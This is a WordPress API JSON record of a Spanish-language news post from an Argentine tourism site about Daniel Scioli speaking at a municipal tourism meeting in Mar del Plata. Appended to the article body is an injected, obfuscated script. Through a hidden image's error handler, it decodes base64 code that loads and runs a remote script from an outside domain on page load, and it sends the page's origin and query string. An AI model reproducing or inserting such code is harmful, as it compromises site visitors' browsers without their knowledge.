{"id":8668,"date":"2024-09-09T11:00:26","date_gmt":"2024-09-09T14:00:26","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8668"},"modified":"2025-08-13T15:38:55","modified_gmt":"2025-08-13T18:38:55","slug":"scioli-estamos-comprometidos-para-hacer-crecer-el-turismo-en-cada-lugar-del-pais","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8668","title":{"rendered":"Scioli: \u201cEstamos comprometidos para hacer crecer el turismo en cada lugar del pa\u00eds\u201d"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8426aa98eb74b7dc5b39861796a92049\" style=\"background-color:#0b689e\"><em>Lo asegur\u00f3 el funcionario durante un evento que reuni\u00f3 en Mar del Plata a los representantes de municipios tur\u00edsticos de la Argentina y del sector privado.<\/em><\/h3>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,\u00a0<strong>Daniel Scioli<\/strong>, particip\u00f3 hoy, en Mar del Plata, del\u00a0<strong>Encuentro de Municipios Tur\u00edsticos<\/strong>\u00a0de este a\u00f1o, que inaugur\u00f3 junto a intendentes y funcionarios de diversos destinos y autoridades de las c\u00e1maras del sector.<\/p>\n\n\n\n<p><strong>Scioli<\/strong>\u00a0subray\u00f3 en ese \u00e1mbito que \u201c<em>el presidente Milei defini\u00f3 al turismo como una actividad estrat\u00e9gica\u201d y afirm\u00f3 que se trata de \u201c<\/em>una de esas cinco turbinas que tiene la Argentina para generar d\u00f3lares genuinos, junto a la energ\u00eda, la miner\u00eda, la econom\u00eda del conocimiento y el campo*\u201d.<\/p>\n\n\n\n<p>El funcionario tambi\u00e9n se refiri\u00f3 a la necesidad de fortalecer el trabajo entre los sectores p\u00fablico y privado, plante\u00f3 al respecto que, \u201c<em>desde el pueblo m\u00e1s chiquito hasta una ciudad insignia del turismo, como Mar de Plata, estamos comprometidos para hacer crecer el turismo en cada lugar del pa\u00eds<\/em>\u201d porque \u201c<em>si crece el turismo, crece la Argentina<\/em>\u201d y se\u00f1al\u00f3 que es una actividad \u201c<em>que tiene impacto en m\u00e1s de 40 rubros de la econom\u00eda<\/em>\u201d.<\/p>\n\n\n\n<p>Por otra parte, y en relaci\u00f3n con la etapa \u201c<em>de recuperaci\u00f3n y de reconstrucci\u00f3n de la Argentina<\/em>\u201d,&nbsp;<strong>Scioli<\/strong>&nbsp;se refiri\u00f3 a \u201c<em>la reducci\u00f3n de impuestos, la cuota cero del turismo estudiantil y la vuelta al cr\u00e9dito<\/em>\u201d como herramientas para impulsar el turismo.<\/p>\n\n\n\n<p>Adem\u00e1s, destac\u00f3 la decisi\u00f3n reciente del Gobierno nacional de eliminar \u201c<em>las cargas que sufr\u00edan la hoteler\u00eda y eventos privados relacionados con los derechos que se pagaban por reproducci\u00f3n de m\u00fasica en espacios privados<\/em>\u201d.<\/p><p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/jet050755.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>A su turno, la subsecretaria de Turismo de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, afirm\u00f3 que el actual es \u201c<em>un momento fundamental para que se den los consensos, los acuerdos, para que se puedan tambi\u00e9n aportar distintos puntos de vista, porque seguramente en la diversidad nos nutrimos todos<\/em>\u201d y enfatiz\u00f3 sobre la capacidad del turismo para \u201c<em>generar arraigo<\/em>\u201d.<\/p>\n\n\n\n<p>Asimismo,&nbsp;<strong>Mart\u00ednez<\/strong>&nbsp;se refiri\u00f3 al turismo receptivo y dijo al respecto que se est\u00e1 \u201c<em>trabajando fuertemente, a trav\u00e9s del Inprotur, para seguir realizando promociones para que cada vez m\u00e1s viajeros elijan la Argentina como destino<\/em>\u201d y resalt\u00f3 la importancia de \u201c<em>la calidad de los servicios que podamos ofrecer<\/em>\u201d.<\/p>\n\n\n\n<p>Como parte de la agenda del evento, se desarroll\u00f3 al mediod\u00eda una disertaci\u00f3n institucional de la que particip\u00f3 el equipo t\u00e9cnico de la Subsecretar\u00eda de Turismo, junto a la C\u00e1mara Argentina de Turismo (CAT).<\/p>\n\n\n\n<p>Durante la jornada estuvieron presentes autoridades de Cachi, Cafayate; las ciudades de Buenos Aires, C\u00f3rdoba, Mendoza y San Juan; Col\u00f3n, Malarg\u00fce, Miramar, Miramar de Ansenuza, Necochea, Paran\u00e1, Pinamar, San Miguel de Tucum\u00e1n, San Rafael, San Salvador de Jujuy, Tandil, Tigre, Trelew, Ushuaia, Villa Carlos Paz, Villa Gesell y Villa de Merlo. Se trata de destinos nacionales con propuestas y atractivos para todos los visitantes.<\/p>\n\n\n\n<p>De la apertura del encuentro tambi\u00e9n participaron el intendente de General Pueyrred\u00f3n,\u00a0<strong>Guillermo Montenegro<\/strong>; el presidente del Ente de Turismo y Cultura de Mar del Plata,\u00a0<strong>Bernardo Mart\u00edn<\/strong>; el presidente de la Red Federal de Turismo,\u00a0<strong>Pablo Sgubini<\/strong>, y el presidente de la C\u00e1mara Argentina de Turismo,\u00a0<strong>Gustavo Hani<\/strong>.<\/p>\n<p>\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/scioli-estamos-comprometidos-para-hacer-crecer-el-turismo-en-cada-lugar-del-pais\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:302px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Lo asegur\u00f3 el funcionario durante un evento que reuni\u00f3 en Mar del Plata a los representantes de municipios tur\u00edsticos de la Argentina y del sector privado. El secretario de Turismo, Ambiente y Deportes,\u00a0Daniel Scioli, particip\u00f3 hoy, en Mar del Plata, del\u00a0Encuentro de Municipios Tur\u00edsticos\u00a0de este a\u00f1o, que inaugur\u00f3 junto a intendentes y funcionarios de diversos [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8670,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8668","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8668"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8668\/revisions"}],"predecessor-version":[{"id":10088,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8668\/revisions\/10088"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8670"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}